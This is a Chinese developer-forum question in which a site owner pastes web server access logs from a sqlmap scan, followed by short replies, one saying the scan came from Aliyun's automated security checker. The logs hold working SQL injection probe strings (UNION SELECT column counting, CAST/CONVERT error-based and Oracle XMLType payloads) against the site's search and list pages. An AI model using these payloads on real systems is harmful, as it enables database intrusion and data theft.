开发者社区> 问答> 正文

今天网站被SQLMAP 扫了。。。


一堆一堆的日志。。。。

110.75.167.220 - - [18/Apr/2013:14:20:37  0800] "GET /search/luceneapi_node/me too?f[0]=sm_field_enshort:me AND 4945=CAST(CHR(58)||CHR(107)||CHR(108)||CHR(121)||CHR(58)||(SELECT (CASE WHEN (4945=4945) THEN 1 ELSE 0 END))::text||CHR(58)||CHR(112)||CHR(104)||CHR(108)||CHR(58) AS NUMERIC) HTTP/1.1" 200 19407 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"
110.75.167.220 - - [18/Apr/2013:14:20:38  0800] "GET /list/kia?page=1') UNION ALL SELECT NULL, NULL-- AND ('koYu'='koYu HTTP/1.1" 200 26143 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"
123.125.71.31 - - [18/Apr/2013:14:20:38  0800] "GET /search/luceneapi_node/电气自动化 HTTP/1.1" 200 4864 "-" "Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2"
110.75.167.220 - - [18/Apr/2013:14:20:38  0800] "GET /search/luceneapi_node/me too?f[0]=sm_field_enshort:me') AND 4945=CAST(CHR(58)||CHR(107)||CHR(108)||CHR(121)||CHR(58)||(SELECT (CASE WHEN (4945=4945) THEN 1 ELSE 0 END))::text||CHR(58)||CHR(112)||CHR(104)||CHR(108)||CHR(58) AS NUMERIC) AND ('nOmJ'='nOmJ HTTP/1.1" 200 19527 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"
110.75.167.220 - - [18/Apr/2013:14:20:38  0800] "GET /list/kia?page=1') UNION ALL SELECT NULL, NULL, NULL-- AND ('pMzo'='pMzo HTTP/1.1" 200 26034 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"
110.75.167.220 - - [18/Apr/2013:14:20:38  0800] "GET /search/luceneapi_node/me too?f[0]=sm_field_enshort:me' AND 4945=CAST(CHR(58)||CHR(107)||CHR(108)||CHR(121)||CHR(58)||(SELECT (CASE WHEN (4945=4945) THEN 1 ELSE 0 END))::text||CHR(58)||CHR(112)||CHR(104)||CHR(108)||CHR(58) AS NUMERIC) AND 'nuwH'='nuwH HTTP/1.1" 200 19609 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"
110.75.167.221 - - [18/Apr/2013:14:20:39  0800] "GET /list/kia?page=1') UNION ALL SELECT NULL, NULL, NULL, NULL-- AND ('kwue'='kwue HTTP/1.1" 200 26099 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"
110.75.167.221 - - [18/Apr/2013:14:20:39  0800] "GET /search/luceneapi_node/me too?f[0]=sm_field_enshort:me) AND 3514=CONVERT(INT,(CHAR(58)+CHAR(107)+CHAR(108)+CHAR(121)+CHAR(58)+(SELECT (CASE WHEN (3514=3514) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(112)+CHAR(104)+CHAR(108)+CHAR(58))) AND (2457=2457 HTTP/1.1" 200 19554 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"
110.75.167.221 - - [18/Apr/2013:14:20:39  0800] "GET /search/luceneapi_node/me too?f[0]=sm_field_enshort:me AND 3514=CONVERT(INT,(CHAR(58)+CHAR(107)+CHAR(108)+CHAR(121)+CHAR(58)+(SELECT (CASE WHEN (3514=3514) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(112)+CHAR(104)+CHAR(108)+CHAR(58))) HTTP/1.1" 200 19453 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"
110.75.167.220 - - [18/Apr/2013:14:20:39  0800] "GET /list/kia?page=1') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND ('OWjb'='OWjb HTTP/1.1" 200 26263 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"
110.75.167.221 - - [18/Apr/2013:14:20:39  0800] "GET /search/luceneapi_node/me too?f[0]=sm_field_enshort:me') AND 3514=CONVERT(INT,(CHAR(58)+CHAR(107)+CHAR(108)+CHAR(121)+CHAR(58)+(SELECT (CASE WHEN (3514=3514) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(112)+CHAR(104)+CHAR(108)+CHAR(58))) AND ('wiYk'='wiYk HTTP/1.1" 200 19575 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"
110.75.167.220 - - [18/Apr/2013:14:20:39  0800] "GET /list/kia?page=1') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND ('BaqI'='BaqI HTTP/1.1" 200 26628 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"
110.75.167.221 - - [18/Apr/2013:14:20:40  0800] "GET /search/luceneapi_node/me too?f[0]=sm_field_enshort:me' AND 3514=CONVERT(INT,(CHAR(58)+CHAR(107)+CHAR(108)+CHAR(121)+CHAR(58)+(SELECT (CASE WHEN (3514=3514) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(112)+CHAR(104)+CHAR(108)+CHAR(58))) AND 'IpSO'='IpSO HTTP/1.1" 200 19640 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"
110.75.167.213 - - [18/Apr/2013:14:20:40  0800] "GET /list/kia?page=1') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND ('Dabl'='Dabl HTTP/1.1" 200 26360 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"
110.75.167.221 - - [18/Apr/2013:14:20:40  0800] "GET /search/luceneapi_node/me too?f[0]=sm_field_enshort:me) AND 8197=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(107)||CHR(108)||CHR(121)||CHR(58)||(SELECT (CASE WHEN (8197=8197) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(112)||CHR(104)||CHR(108)||CHR(58)||CHR(62))) FROM DUAL) AND (6476=6476 HTTP/1.1" 200 19932 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"


展开
收起
xiao2qiangda 2013-04-18 18:21:39 11225 0
3 条回答
写回答
取消 提交回答
  • 呵呵。
    2013-04-18 19:48:25
    赞同 展开评论 打赏
  • 楼主,没事的,110.75.167.221是阿里云的云盾自动扫描,是看看你的站点有没有SQL注入的风险。
    2013-04-18 19:30:36
    赞同 展开评论 打赏
  • 服务器没事吧?
    2013-04-18 19:21:34
    赞同 展开评论 打赏
问答排行榜
最热
最新

相关电子书

更多
低代码开发师(初级)实战教程 立即下载
冬季实战营第三期:MySQL数据库进阶实战 立即下载
阿里巴巴DevOps 最佳实践手册 立即下载